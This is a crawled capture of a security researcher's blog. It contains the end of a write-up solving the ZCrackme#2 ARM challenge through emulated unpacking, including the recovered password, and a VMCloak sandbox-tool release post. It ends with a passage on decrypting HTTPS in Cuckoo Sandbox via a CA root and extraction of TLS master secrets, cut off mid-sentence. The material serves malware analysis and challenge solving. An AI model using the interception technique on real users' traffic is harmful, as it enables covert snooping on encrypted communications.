srchttp://jbremer.org/wp-includes/images/smilies/icon_smile.gif alt:) classwp-smiley /> /p>h1>Contact/h1>p>For questions etc, you know a hrefhttps://twitter.com/skier_t>where/a> to a hrefmailto:jurriaanbremer@gmail.com>find me/a>./p> /div>!-- .entry-content --> footer classentry-meta> span classcat-links> span classentry-utility-prep entry-utility-prep-cat-links>Posted in/span> a hrefhttp://jbremer.org/category/uncategorized/ titleView all posts in Uncategorized relcategory tag>Uncategorized/a> /span> span classsep> | /span> span classcomments-link>a hrefhttp://jbremer.org/darm-update-more-armv7-more-thumb/#respond titleComment on Darm Update – More ARMv7, More Thumb>span classleave-reply>Leave a reply/span>/a>/span> /footer>!-- #entry-meta --> /article>!-- #post-189 --> article idpost-185 classpost-185 post type-post status-publish format-standard hentry category-uncategorized> header classentry-header> h1 classentry-title>a hrefhttp://jbremer.org/solving-zcrackme2-a-custom-emulator-approach/ titlePermalink to Solving ZCrackme#2: A Custom Emulator Approach relbookmark>Solving ZCrackme#2: A Custom Emulator Approach/a>/h1> div classentry-meta> span classsep>Posted on /span>a hrefhttp://jbremer.org/solving-zcrackme2-a-custom-emulator-approach/ title12:16 pm relbookmark>time classentry-date datetime2013-08-07T12:16:51+00:00 pubdate>August 7, 2013/time>/a>span classby-author> span classsep> by /span> span classauthor vcard>a classurl fn n hrefhttp://jbremer.org/author/jbremer/ titleView all posts by jbremer relauthor>jbremer/a>/span>/span> /div>!-- .entry-meta --> div classcomments-link> a hrefhttp://jbremer.org/solving-zcrackme2-a-custom-emulator-approach/#respond titleComment on Solving ZCrackme#2: A Custom Emulator Approach>span classleave-reply>Reply/span>/a> /div> /header>!-- .entry-header --> div classentry-content> style>li p { margin: 0; padding: 0;}/* undo stupid brs by wordpress */br { display: none;}/style>h1>Solving ZCrackme#2: A Custom Emulator Approach/h1>p>Due to my non-existent experience with using gdb under ARMv7, I decided tobr />solve this challenge (the a hrefhttp://blog.zimperium.com/arm-crackme-competition/>ZCrackme #2 Challenge/a>) using a a hrefhttps://github.com/jbremer/darmu>minimalbr />ARMv7 emulator/a> based on my a hrefhttps://github.com/jbremer/darm>ARMv7 disassembler/a>. (The originalbr />challenge can be found a href/wp-posts/zcrackme-orig>here/a>.)/p>h2>ZCrackme#2 Challenge/h2>p>The binary itself is fairly interesting. It has a similar structure as thebr />first ZCrackme challenge (not sure if there’s a blogpost about this onebr />though.) Basically the ELF header is messed up, sections are missing, and thebr />Entry Point points to a page filled with zeroes./p>h2>INIT_ARRAY/h2>p>Upon further inspection, using em>readelf -a zcrackme2/em>, we find that the binarybr />features the so-called em>preinit-array/em>, em>init-array/em>, and em>fini-array/em> dynamicbr />sections. These dynamic sections in fact represent a table of functionbr />addresses which are being called right before calling the real Entrybr />Point (in the case of em>preinit-array/em> and em>init-array/em>) and called afterbr />calling the real Entry Point (in the case of em>fini-array/em>.)/p>p>Looking up the various virtual offsets using IDA Pro, we find that only thebr />em>init-array/em> points to a real address, em>loc_B0D8/em>. (The other table arrays,br />em>preinit-array/em> and em>fini-array/em>, are filled with zeroes and -1′s, which arebr />nops – as in, these are not really called.)/p>p>We conclude that the actual entry point, or, the code that will be executedbr />first, is located at this (strong>loc_B0D8/strong>) address. From analyzing this routinebr />in IDA Pro, we seebr />some sort of decryption loop which overwrites some memory. Finally, afterbr />executing said decryption loop, an interesting system call is performed,br />namely #0xf0002. We find that this system call representsbr />a hrefhttps://code.google.com/p/android/issues/detail?id1803>__clear_cache/a>./p>h2>__clear_cache/h2>p>Basically, before the decrypted code can be executed, the code cache first hasbr />to be cleared for the particular address range in order to make sure that,br />when it is being executed, the new code will be executed, rather than anybr />remaining code in the cache./p>p>Similar tricks to this (decrypting code and clearing the cache) are performedbr />a total of five times in this crackme./p>p>So, having cleared the cache, the execution flow of the crackme now ends up inbr />the decrypted code. Which, in turn, does some more rounds of decryption./p>h2>Code Decryption/h2>p>As mentioned, the crackme overwrites memory of the ELF file a total of fivebr />times. One of these “decryptions” in fact zeroes the first 100 bytes of thebr />ELF header. As our goal is to dump a decrypted version of the crackme binary,br />this ELF header corruption does not help us (as IDA Pro wouldn’t understandbr />the binary anymore.)/p>h2>Reconstructing a Decrypted Binary/h2>p>As decryption is being followed by clearing the cache each time, we dump a newbr />binary during each time the cache is cleared. We do this by em>applying/em> thebr />changes to a copy of the original binary. That is, read the decrypted databr />from emulator memory, and overwriting it to our original binaries buffer. Webr />do this for each decryption, except for the one iteration where the ELF headerbr />is zeroed out. (Note: the em>__clear_cache/em> system call takes the startingbr />address as first parameter and the end address as second parameter, hence itbr />is trivial for us to find out which chunks of memory have been decrypted.)/p>h2>Scripting the Emulator/h2>p>The a href/wp-posts/zcrackme.py>following script/a>, although a bit messy, represents the code to dumpbr />the binary a couple of times, which results in the final binary we’rebr />interested in. The unpacked binary can be found a href/wp-posts/zcrackme-unpacked>here/a>. (Note that thisbr />unpacked binary may be inaccurate, with regards to global variables etc thatbr />have been updated during runtime but are not reflected in this version of thebr />binary.)/p>p>Having successfully dumped the unpacked binary, it is now time for some staticbr />analysis on this binary. Do note that a hrefhttps://github.com/jbremer/darmu>our emulator/a> should run fine onbr />Windows and Linux (with a 32bit Python installed, that is.)/p>h2>The actual Crackme/h2>p>Looking through the dumped binary, we find ourselves looking at em>sub_87B4/em>,br />which is the function where the real stuff is happening (argc/argv parsing,br />that is.)/p>p>There are a couple of odd text messages which will be printed wheneverbr />incorrect information is entered on the commandline. Finally, we find somebr />interesting function calls, of which one to em>sub_8638/em>, which seems to decryptbr />the string buffer that can be found at em>byte_9C35/em>, and another function whichbr />does a custom strcmp() against the argument on the commandline./p>p>The string at em>byte_9C35/em> is decrypted by xor’ing with 0x0d (decrypted to abr />buffer on the stack by em>sub_8638/em>), resulting in thebr />string strong>ZenCracking/strong>. That said, we’ve solved the challenge../p>h2>Conclusion/h2>p>In case somebody has a working gdb for ARMv7 setup, this challenge is probablybr />pretty easy (i.e., step through the various decryption iterations, and try tobr />find the custom strcmp.) However, I had fun implementing the simple ARMv7br />emulator, which is in fact pretty tricky, with all the conditional stuff goingbr />on./p>p>Now a harder crackme? Let’s hope the next one does not involve xorbr />“encryption” :p Zimperium’s response was, however, that having gotten to thebr />xor-decryption part already shows enough knowledge and understanding of ARMv7,br />to which I agree img srchttp://jbremer.org/wp-includes/images/smilies/icon_smile.gif alt:) classwp-smiley /> /p> /div>!-- .entry-content --> footer classentry-meta> span classcat-links> span classentry-utility-prep entry-utility-prep-cat-links>Posted in/span> a hrefhttp://jbremer.org/category/uncategorized/ titleView all posts in Uncategorized relcategory tag>Uncategorized/a> /span> span classsep> | /span> span classcomments-link>a hrefhttp://jbremer.org/solving-zcrackme2-a-custom-emulator-approach/#respond titleComment on Solving ZCrackme#2: A Custom Emulator Approach>span classleave-reply>Leave a reply/span>/a>/span> /footer>!-- #entry-meta --> /article>!-- #post-185 --> nav idnav-below> h3 classassistive-text>Post navigation/h3> div classnav-previous>a hrefhttp://jbremer.org/page/2/ >span classmeta-nav>←/span> Older posts/a>/div> div classnav-next>/div> /nav>!-- #nav-above --> /div>!-- #content --> /div>!-- #primary --> div idsecondary classwidget-area rolecomplementary> aside idrecent-posts-2 classwidget widget_recent_entries> h3 classwidget-title>Recent Posts/h3> ul> li>a hrefhttp://jbremer.org/vmcloak3/ titleRevamped VMCloak 0.3>Revamped VMCloak 0.3/a>/li> li>a hrefhttp://jbremer.org/mitm/ titleTransparent MITM with Cuckoo Sandbox>Transparent MITM with Cuckoo Sandbox/a>/li> li>a hrefhttp://jbremer.org/vmcloak2/ titleVMCloak 0.2: Windows 7 Support>VMCloak 0.2: Windows 7 Support/a>/li> li>a hrefhttp://jbremer.org/vmcloak/ titleVMCloak: Automated Virtual Machine Generation and Cloaking for Cuckoo Sandbox>VMCloak: Automated Virtual Machine Generation and Cloaking for Cuckoo Sandbox/a>/li> li>a hrefhttp://jbremer.org/mona-101-a-global-samsung-dll/ titleMona 101: a Global Samsung DLL>Mona 101: a Global Samsung DLL/a>/li> li>a hrefhttp://jbremer.org/turning-arbitrary-gdbserver-sessions-into-rce/ titleTurning arbitrary GDBserver sessions into RCE>Turning arbitrary GDBserver sessions into RCE/a>/li> li>a hrefhttp://jbremer.org/dalvik-research/ titleDalvik Research>Dalvik Research/a>/li> li>a hrefhttp://jbremer.org/dirkjan/ titleDirkjan Email Feed>Dirkjan Email Feed/a>/li> li>a hrefhttp://jbremer.org/darm-update-more-armv7-more-thumb/ titleDarm Update – More ARMv7, More Thumb>Darm Update – More ARMv7, More Thumb/a>/li> li>a hrefhttp://jbremer.org/solving-zcrackme2-a-custom-emulator-approach/ titleSolving ZCrackme#2: A Custom Emulator Approach>Solving ZCrackme#2: A Custom Emulator Approach/a>/li> li>a hrefhttp://jbremer.org/automated-deobfuscation-of-android-applications/ titleAutomated Deobfuscation of Android Applications>Automated Deobfuscation of Android Applications/a>/li> li>a hrefhttp://jbremer.org/pintool-and-z3-introduction/ titlePintool and Z3 Introduction>Pintool and Z3 Introduction/a>/li> li>a hrefhttp://jbremer.org/python-source-obfuscation-using-asts/ titlePython Source Obfuscation using ASTs>Python Source Obfuscation using ASTs/a>/li> li>a hrefhttp://jbremer.org/cross-referencing-stand-alone-dalvik-bytecode/ titleCross-referencing stand-alone Dalvik Bytecode>Cross-referencing stand-alone Dalvik Bytecode/a>/li> li>a hrefhttp://jbremer.org/darm/ titleDarm – An armv7 disassembler>Darm – An armv7 disassembler/a>/li> li>a hrefhttp://jbremer.org/python-binary-extensions-for-compilers/ titlePython Binary Extensions for Compilers>Python Binary Extensions for Compilers/a>/li> li>a hrefhttp://jbremer.org/apache-log-parsing/ titleApache Log Parsing>Apache Log Parsing/a>/li> li>a hrefhttp://jbremer.org/pin-denial-of-service/ titlePin Denial of Service>Pin Denial of Service/a>/li> li>a hrefhttp://jbremer.org/malware-lu-hackgyver-challenges/ titleMalware.lu HackGyver Challenges>Malware.lu HackGyver Challenges/a>/li> li>a hrefhttp://jbremer.org/pintool-makefile/ titlePintool Makefile>Pintool Makefile/a>/li> li>a hrefhttp://jbremer.org/detecting-uninitialized-memory-read-access-bugs-using-pin-a-la-valgrind/ titleDetecting Uninitialized Memory Read Access Bugs using Pin (a la Valgrind)>Detecting Uninitialized Memory Read Access Bugs using Pin (a la Valgrind)/a>/li> li>a hrefhttp://jbremer.org/x86-api-hooking-demystified/ titlex86 API Hooking Demystified>x86 API Hooking Demystified/a>/li> li>a hrefhttp://jbremer.org/malware-unpacking-level-pintool/ titleMalware Unpacking Level: Pintool>Malware Unpacking Level: Pintool/a>/li> li>a hrefhttp://jbremer.org/context-thread-all-the-things/ titleContext Thread ALL The Things>Context Thread ALL The Things/a>/li> li>a hrefhttp://jbremer.org/abusing-forced-inline-part-2-breakpoints/ titleAbusing Forced Inline Part 2: Breakpoints>Abusing Forced Inline Part 2: Breakpoints/a>/li> li>a hrefhttp://jbremer.org/abusing-forced-inline-in-c/ titleAbusing Forced Inline in C>Abusing Forced Inline in C/a>/li> li>a hrefhttp://jbremer.org/intercepting-system-calls-on-x86_64-windows/ titleIntercepting System Calls on x86_64 Windows>Intercepting System Calls on x86_64 Windows/a>/li> li>a hrefhttp://jbremer.org/format-string-vulnerabilities/ titleFormat String Vulnerabilities>Format String Vulnerabilities/a>/li> li>a hrefhttp://jbremer.org/optimizing-algorithms/ titleOptimizing Algorithms>Optimizing Algorithms/a>/li> li>a hrefhttp://jbremer.org/xss/ titleXSS>XSS/a>/li> li>a hrefhttp://jbremer.org/hello-world/ titleHello world!>Hello world!/a>/li> /ul> /aside>aside idmeta-2 classwidget widget_meta>h3 classwidget-title>Blog/h3> ul> li>a hrefhttp://jbremer.org/wp-login.php>Log in/a>/li> li>a hrefhttp://jbremer.org/feed/ titleSyndicate this site using RSS 2.0>Entries abbr titleReally Simple Syndication>RSS/abbr>/a>/li> li>a hrefhttp://jbremer.org/comments/feed/ titleThe latest comments to all posts in RSS>Comments abbr titleReally Simple Syndication>RSS/abbr>/a>/li> li>a hrefhttp://wordpress.org/ titlePowered by WordPress, state-of-the-art semantic personal publishing platform.>WordPress.org/a>/li> /ul>/aside> /div>!-- #secondary .widget-area --> /div>!-- #main --> footer idcolophon rolecontentinfo> div idsite-generator> a hrefhttp://wordpress.org/ titleSemantic Personal Publishing Platform relgenerator>Proudly powered by WordPress/a> /div> /footer>!-- #colophon -->/div>!-- #page -->script typetext/javascript srchttp://jbremer.org/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shCore.js?ver3.0.83c>/script>script typetext/javascript srchttp://jbremer.org/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushBash.js?ver3.0.83c>/script>script typetext/javascript srchttp://jbremer.org/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushCpp.js?ver3.0.83c>/script>script typetext/javascript srchttp://jbremer.org/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushPython.js?ver3.0.83c>/script>script typetext/javascript> (function(){ var corecss document.createElement(link); var themecss document.createElement(link); var corecssurl http://jbremer.org/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shCore.css?ver3.0.83c; if ( corecss.setAttribute ) { corecss.setAttribute( rel, stylesheet ); corecss.setAttribute( type, text/css ); corecss.setAttribute( href, corecssurl ); } else { corecss.rel stylesheet; corecss.href corecssurl; } document.getElementsByTagName(head)0.insertBefore( corecss, document.getElementById(syntaxhighlighteranchor) ); var themecssurl http://jbremer.org/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shThemeDefault.css?ver3.0.83c; if ( themecss.setAttribute ) { themecss.setAttribute( rel, stylesheet ); themecss.setAttribute( type, text/css ); themecss.setAttribute( href, themecssurl ); } else { themecss.rel stylesheet; themecss.href themecssurl; } //document.getElementById(syntaxhighlighteranchor).appendChild(themecss); document.getElementsByTagName(head)0.insertBefore( themecss, document.getElementById(syntaxhighlighteranchor) ); })(); SyntaxHighlighter.config.strings.expandSource + expand source; SyntaxHighlighter.config.strings.help ?; SyntaxHighlighter.config.strings.alert SyntaxHighlighter\n\n; SyntaxHighlighter.config.strings.noBrush Can\t find brush for: ; SyntaxHighlighter.config.strings.brushNotHtmlScript Brush wasn\t configured for html-script option: ; SyntaxHighlighter.defaultspad-line-numbers true; SyntaxHighlighter.defaultstoolbar false; SyntaxHighlighter.all();/script>/body>/html>
Port 443
HTTP/1.1 200 OKDate: Sat, 05 Oct 2024 11:17:38 GMTServer: ApacheX-Pingback: http://jbremer.org/xmlrpc.phpContent-Length: 96004Content-Type: text/html; charsetUTF-8 !DOCTYPE html>!--if IE 6>html idie6 dirltr langen-US>!endif-->!--if IE 7>html idie7 dirltr langen-US>!endif-->!--if IE 8>html idie8 dirltr langen-US>!endif-->!--if !(IE 6) | !(IE 7) | !(IE 8) >!-->html dirltr langen-US>!--!endif-->head>meta charsetUTF-8 />meta nameviewport contentwidthdevice-width />title>Development & Security | By Jurriaan Bremer @skier_t/title>link relprofile hrefhttp://gmpg.org/xfn/11 />link relstylesheet typetext/css mediaall hrefhttps://jbremer.org/wp-content/themes/twentyeleven/style.css />link relpingback hrefhttp://jbremer.org/xmlrpc.php />!--if lt IE 9>script srchttps://jbremer.org/wp-content/themes/twentyeleven/js/html5.js typetext/javascript>/script>!endif-->link relalternate typeapplication/rss+xml titleDevelopment & Security » Feed hrefhttps://jbremer.org/feed/ />link relalternate typeapplication/rss+xml titleDevelopment & Security » Comments Feed hrefhttps://jbremer.org/comments/feed/ />link relEditURI typeapplication/rsd+xml titleRSD hrefhttps://jbremer.org/xmlrpc.php?rsd />link relwlwmanifest typeapplication/wlwmanifest+xml hrefhttps://jbremer.org/wp-includes/wlwmanifest.xml /> meta namegenerator contentWordPress 3.4 />meta idsyntaxhighlighteranchor namesyntaxhighlighter-version content3.1.3 />script typetext/javascript> var _gaq _gaq || ; _gaq.push(_setAccount, UA-33161212-1); _gaq.push(_trackPageview); (function() { var ga document.createElement(script); ga.type text/javascript; ga.async true; ga.src (https: document.location.protocol ? https://ssl : http://www) + .google-analytics.com/ga.js; var s document.getElementsByTagName(script)0; s.parentNode.insertBefore(ga, s); })();/script>/head>body classhome blog single-author two-column right-sidebar>div idpage classhfeed> header idbranding rolebanner> hgroup> h1 idsite-title>span>a hrefhttps://jbremer.org/ titleDevelopment & Security relhome>Development & Security/a>/span>/h1> h2 idsite-description>By Jurriaan Bremer a hrefhttps://twitter.com/skier_t>@skier_t/a>/h2> /hgroup> form methodget idsearchform actionhttps://jbremer.org/> label fors classassistive-text>Search/label> input typetext classfield names ids placeholderSearch /> input typesubmit classsubmit namesubmit idsearchsubmit valueSearch /> /form> nav idaccess rolenavigation> h3 classassistive-text>Main menu/h3> div classskip-link>a classassistive-text href#content titleSkip to primary content>Skip to primary content/a>/div> div classskip-link>a classassistive-text href#secondary titleSkip to secondary content>Skip to secondary content/a>/div> div classmenu>ul>li classcurrent_page_item>a hrefhttps://jbremer.org/ titleHome>Home/a>/li>/ul>/div> /nav>!-- #access --> /header>!-- #branding --> div idmain> div idprimary> div idcontent rolemain> nav idnav-above> h3 classassistive-text>Post navigation/h3> div classnav-previous>a hrefhttps://jbremer.org/page/2/ >span classmeta-nav>←/span> Older posts/a>/div> div classnav-next>/div> /nav>!-- #nav-above --> article idpost-234 classpost-234 post type-post status-publish format-standard hentry category-uncategorized> header classentry-header> h1 classentry-title>a hrefhttps://jbremer.org/vmcloak3/ titlePermalink to Revamped VMCloak 0.3 relbookmark>Revamped VMCloak 0.3/a>/h1> div classentry-meta> span classsep>Posted on /span>a hrefhttps://jbremer.org/vmcloak3/ title6:02 pm relbookmark>time classentry-date datetime2015-10-05T18:02:50+00:00 pubdate>October 5, 2015/time>/a>span classby-author> span classsep> by /span> span classauthor vcard>a classurl fn n hrefhttps://jbremer.org/author/jbremer/ titleView all posts by jbremer relauthor>jbremer/a>/span>/span> /div>!-- .entry-meta --> div classcomments-link> a hrefhttps://jbremer.org/vmcloak3/#respond titleComment on Revamped VMCloak 0.3>span classleave-reply>Reply/span>/a> /div> /header>!-- .entry-header --> div classentry-content> style>li p { margin: 0; padding: 0;}/* undo stupid brs by wordpress */br { display: none;}/style>h1>VMCloak 0.3: Totally revamped & Office support/h1>p>To quickly summarize - VMCloak is a tool for automatically creating, cloning,br />and cloaking Virtual Machines to be used for Cuckoo Sandbox./p>p>Earlier of this year I released a hrefhttp://jbremer.org/vmcloak2/>VMCloak 0.2/a>. Now the time has comebr />for the next release, 0.3. Most notable about this release is the revampedbr />command-line usage, the improvements with regards to installing dependenciesbr />in the Virtual Machine, and the latest dependency, Office 2007. Thanks tobr />a hrefhttps://lgscout.com/>LookingGlass Cyber Solutions/a> for supporting the development towardsbr />this release including the Microsoft Office 2007 integration./p>h1>So what about it?/h1>p>The new command-line interface feels a bit more hipster and less obtusebr />compared to how its usage used to be. Most importantly, setting up a Virtualbr />Machine is no longer a one-shot action. Instead there are now a couple ofbr />different subcommands, each to fulfill their own task.br />In addition to that the new VMCloak version utilizes the newbr />a hrefhttps://github.com/jbremer/agent>Cuckoo Agent/a> – it is less Cuckoo-specific and features more generalbr />purpose uses, allowing easier communication between the VM and the variousbr />VMCloak subcommands./p>h1>The subcommands./h1>p>As a few new commands are now available it does make sense to elaborate onbr />them a little bit. So here goes. Note that all commands can be ran either bybr />calling em>vmcloak-xyz/em> or em>vmcloak xyz/em> on the command-line./p>p>strong>vmcloak-init/strong> is the new command to initialize a new Virtual Machine. Onebr />can specify a couple of flags, but the most important one is whether this isbr />going to be a Windows XP VM or a Windows 7 VM, and in the case of Windows 7br />whether it will 32-bit or 64-bit (32-bit being the default)./p>p>So to get started we can run the following command to create a new 64-bitbr />Windows 7 VM. Note that this will be a VM em>internal/em> to VMCloak – it can notbr />be used right away in Cuckoo. For Windows XP setups a serial key is alsobr />required, on Windows 7 a serial key is optional (by default a dummy keybr />provided by Microsoft is used). And also, just a hrefhttp://jbremer.org/vmcloak2/>like before/a> youbr />still have to mount the Windows ISO file and setup em>vboxnet0/em>./p>p>pre classbrush: bash; title: ; notranslate title># Install the latest vmcloak.sudo pip install vmcloak --upgrade# Mount the Windows 7 Installer ISO.sudo mkdir -p /mnt/win7sudo mount -o loop,ro win7.iso /mnt/win7# Ensure the hostonly adapter is up.vmcloak-vboxnet0# Actually initialize the 64-bit Windows 7 VM.vmcloak init --win7x64 seven0/pre>/p>p>Fast-forward 15 to 20 minutes Windows has now been installed in your VM, thebr />VM has been shutdown, and the VM has been removed from the VirtualBoxbr />interface. All that remains is a VirtualBox harddisk file (.vdi file) inbr />~/.vmcloak/image and an entry about this new VM in VMCloaks new sqlite3br />database./p>p>Moving forward it is time to install a couple of software packages in the VM.br />Using strong>vmcloak-install/strong> we will now install all of the currently supportedbr />dependencies. The first parameter represents the name of our VM followed bybr />all the dependencies that should be installed./p>p>pre classbrush: bash; title: ; notranslate title>vmcloak install seven0 adobe9 wic pillow dotnet40 java7/pre>/p>p>Now to install Office 2007, assuming you have a valid ISO and serial key, onebr />can achieve to do so as follows. The ISO path and serial key have to bebr />provided as options to the dependency./p>p>pre classbrush: bash; title: ; notranslate title>vmcloak install seven0 office2007 \ office2007.isopath/path/to/a.iso \ office2007.serialkeyABC-DEF/pre>/p>p>If required one can also easily do manual changes to VMCloak VMs now. Bybr />calling strong>vmcloak-modify/strong> with the VM name as only parameter it is possiblebr />to change everything to your likings and simply by shutting the VM down, frombr />within Windows, the changes are made persistent. If you are running VMCloakbr />locally then the em>–vm-visible/em> argument makes sense. For remote interactionbr />with the VM you should enable VRDE support on the VM and connect to it (e.g.,br />through em>rdesktop -KPz ip:3389/em>)./p>p>Finally there is the strong>vmcloak-snapshot/strong> command which makes a snapshot ofbr />your VM. There are a couple of options available for this command, but it isbr />mostly providing the name of the VMCloak VM, the name of the resulting VM asbr />it will be used by Cuckoo, and the static IP address to assign./p>p>pre classbrush: bash; title: ; notranslate title>vmcloak snapshot seven0 cuckoo1 192.168.56.101/pre>/p>p>It is important to understand that after creating a snapshot of a VMCloak VM,br />as one does by running the em>vmcloak-snapshot/em> command on it, the VMCloak VMbr />becomes immutable. That is, you will no longer be able to runbr />em>vmcloak-install/em> or em>vmcloak-modify/em> on it. The reasoning behind this is tobr />save on valuable resources. Filling your harddisk is quite easy when you havebr />twenty Windows 7 VMs which each take up to 10GB./p>p>If one decides he or she would like to update a VMCloak VM that is of coursebr />still possible. For now the only way down that road is by cloning thatbr />particular VMCloak VM. In the following example we clone em>seven0/em> tobr />em>seven0p1/em> (or, em>seven0/em> with one patch applied)./p>p>pre classbrush: bash; title: ; notranslate title>vmcloak clone seven0 seven0p1/pre>/p>p>I hope to have shed some light on the latest release. Going at it one step atbr />a time, life has just gotten slightly easier again./p> /div>!-- .entry-content --> footer classentry-meta> span classcat-links> span classentry-utility-prep entry-utility-prep-cat-links>Posted in/span> a hrefhttps://jbremer.org/category/uncategorized/ titleView all posts in Uncategorized relcategory tag>Uncategorized/a> /span> span classsep> | /span> span classcomments-link>a hrefhttps://jbremer.org/vmcloak3/#respond titleComment on Revamped VMCloak 0.3>span classleave-reply>Leave a reply/span>/a>/span> /footer>!-- #entry-meta --> /article>!-- #post-234 --> article idpost-230 classpost-230 post type-post status-publish format-standard hentry category-uncategorized> header classentry-header> h1 classentry-title>a hrefhttps://jbremer.org/mitm/ titlePermalink to Transparent MITM with Cuckoo Sandbox relbookmark>Transparent MITM with Cuckoo Sandbox/a>/h1> div classentry-meta> span classsep>Posted on /span>a hrefhttps://jbremer.org/mitm/ title9:54 pm relbookmark>time classentry-date datetime2015-07-26T21:54:02+00:00 pubdate>July 26, 2015/time>/a>span classby-author> span classsep> by /span> span classauthor vcard>a classurl fn n hrefhttps://jbremer.org/author/jbremer/ titleView all posts by jbremer relauthor>jbremer/a>/span>/span> /div>!-- .entry-meta --> div classcomments-link> a hrefhttps://jbremer.org/mitm/#respond titleComment on Transparent MITM with Cuckoo Sandbox>span classleave-reply>Reply/span>/a> /div> /header>!-- .entry-header --> div classentry-content> style>li p { margin: 0; padding: 0;}/* undo stupid brs by wordpress */br { display: none;}/style>h1>Transparent MITM with Cuckoo Sandbox/h1>p>In a series of upcoming blogposts I will be sharing a fair amount of coolbr />features that have been worked on over the past year in Cuckoo Sandbox. Thisbr />first blogpost features Man in the Middle support for Cuckoo Sandbox./p>p>(For those that are familiar Cuckoo Sandbox and the general ideas behind MITM,br />please scroll down to the em>slightly/em> more exciting stuff in the strong>Transparentbr />snooping of HTTPS traffic/strong> paragraph)./p>h1>So, man in the middle?/h1>p>As we are well aware MITM is generally used to explain the process of snoopingbr />on otherwise encrypted information, in this case network traffic. In thisbr />blogpost we will dive into two different ways of doing MITM:/p>ul>li>Providing a CA Root Certificate to allow a MITM proxy to intercept traffic./li>li>Transparent dumping of TLS Master Secrets to decrypt TLS traffic./li>/ul>h1>Eh, Cuckoo Sandbox?/h1>p>Before we continue onto the MITM stuff first a reminder on Cuckoo Sandbox. Asbr />some of you will be familiar with, a hrefhttp://cuckoosandbox.org/>Cuckoo Sandbox/a> is an Open Sourcebr />Automated Malware Analysis Sandbox. Analyses are performed by starting a VMbr />(Virtual Machine) and running the potentially malicious sample, or URL as webr />will be exploring in this blogpost, inside the VM. Then stopping the VM oncebr />the analysis is done./p>p>Due to a personal interest, and that of some of my clients, Cuckoo has beenbr />getting much, much better at analyzing Internet Explorer and alike in the pastbr />few months. Both in actually analyzing it, but also due to developmentsbr />outside of the actual analysis, as will be outlined in this blogpost.br />(For a part of the improvements on the analysis part I would like to thankbr />Brad Spengler for continuously providing feedback and bug fixes)./p>h1>At work with mitmproxy/h1>p>The first solution to provide MITM support to Cuckoo was to integrate a toolbr />called a hrefhttp://mitmproxy.org/>mitmproxy/a>, created by Aldo Cortesi and maintained by fellowbr />a hrefhttp://honeynet.org/>The Honeynet Project/a> member Maximilian Hils./p>p>As outlined by the documentation mitmproxy works bybr />a hrefhttp://mitmproxy.org/doc/certinstall.html>installing a CA Root Certificate/a> on the target device, in this case abr />VM running either Windows XP or Windows 7./p>p>After Googling around and looking at GUI dialogs to em>import/em> certificates intobr />the Windows Certificate store I finally managed to find anbr />a hrefhttps://github.com/cuckoobox/cuckoo/blob/85d15a81314e9953c58a8fa8102d069eb8aa8abb/analyzer/windows/modules/auxiliary/installcert.py#L35-L36>easy command-line way to import a certificate/a> (that only works onbr />Windows 7, not Windows XP). So basically invoking certutil.exe imports a .p12br />certificate, this certificate can be found in ~/.mitmproxy after runningbr />mitmproxy once (the first time mitmproxy is ran on a system it automaticallybr />creates a unique set of certificates)./p>p>At this point there are two ways to throttle traffic from the VM intobr />mitmproxy. For the time being I have a hrefhttps://github.com/cuckoobox/cuckoo/blob/130247f4f2260fe85fd463464c78f1504c34efe2/analyzer/windows/modules/packages/ie.py#L98-L115>taken the easy way/a>, whichbr />involves explicitly routing traffic through a socks4/5 proxy, but thisbr />approach has obvious disadvantages:/p>ul>li>This technique is em>not/em> compatible with a hrefhttps://www.owasp.org/index.php/Certificate_and_Public_Key_Pinning>Certificate Pinning/a>./li>li>Looking at the PCAP file all traffic goes to the proxy./li>li>Having to explicitly tunnel traffic through socks4/5 translates into thisbr /> technique not working for anything but Internet Explorer (i.e., at thisbr /> point no support has been provided for other applications)./li>li>Hostnames are not resolved in the VM. Did I mention all the traffic goes tobr /> the proxy?/li>/ul>p>A better approach would be to route VM traffic to the proxy by the use of abr />tool such as a hrefhttp://darkk.net.ru/redsocks/>redsocks/a> (not to be confused with a hrefhttp://redsocks.nl/>RedSocks/a>, abr />Dutch startup and one of my clients, providing the malware threat defender, abr />network security appliance for detecting malware infections and other unwantedbr />software in your corporate network).br />Anyway, a possible drawback of such tool is the requirement of having tobr />configure it through various root commands, a requirement that generally isbr />not available to Cuckoo once it is running. I have to look into this later..br />(And also this technique still requires the CA Root Certificate and thus it isbr />not compatible with Certificate Pinning)./p>h1>Transparent snooping of HTTPS traffic/h1>p>Going a bit more in-depth with a hrefhttps://en.wikipedia.org/wiki/HTTPS>HTTPS/a> and a hrefhttps://en.wikipedia.org/wiki/Transport_Layer_Security>TLS/a> we learnbr />that in the a hrefhttp://www.moserware.com/2009/06/first-few-milliseconds-of-https.html>TLS protocol/a> the client and server exchange a per-sessionbr />em>random/em> which, a hrefhttp://security.stackexchange.com/questions/89383/why-does-the-ssl-tls-handshake-have-a-client-and-server-random/89655#89655>in combination with the master secret/a>, can bebr />used to derive the encryption keys, MAC keys, and IVs (when needed) which inbr />turn allow one to fully decrypt the TLS stream./p>p>Reading further we find a hrefhttp://reverseengineering.stackexchange.com/questions/2681/is-it-possible-to-decrypt-an-ssl-connection-short-of-bruteforcing/2695#2695>where and how to intercept the PRF function/a> bybr />Brendan Dolan-Gavitt, the a hrefhttps://github.com/moyix/panda>developer of PANDA/a>. We also find whichbr />information is required a hrefhttps://ask.wireshark.org/questions/4229/follow-ssl-stream-using-master-key-and-session-id>to decrypt TLS streams in Wireshark/a>./p>p>Time to take a step back. So we require the RSA Session ID, which, as definedbr />in the a hrefhttp://www.moserware.com/2009/06/first-few-milliseconds-of-https.html>TLS protocol/a>, can be extracted from the em>Server Hello/em> record.br />We also require the Master Secret, which, a hrefhttp://security.stackexchange.com/questions/89383/why-does-the-ssl-tls-handshake-have-a-client-and-server-random/89655#89655>as we have seen/a>, canbr />be extracted from the PRF function call. By instrumenting the PRF functionbr />call looking for calls which feature the “key expansion” string (as defined inbr />a hrefhttp://tools.ietf.org/html/rfc2246#page-21>RFC 2246/a>) we see that we can extract the master secret together withbr />the server random./p>p>Long story short. If we extract each pair of em>server random/em> and em>masterbr />secret/em> from the PRF function in lsass.exe (Brendan outlined that all TLSbr />encryption is performed by the lsass.exe service on Windows, Windows 7 atbr 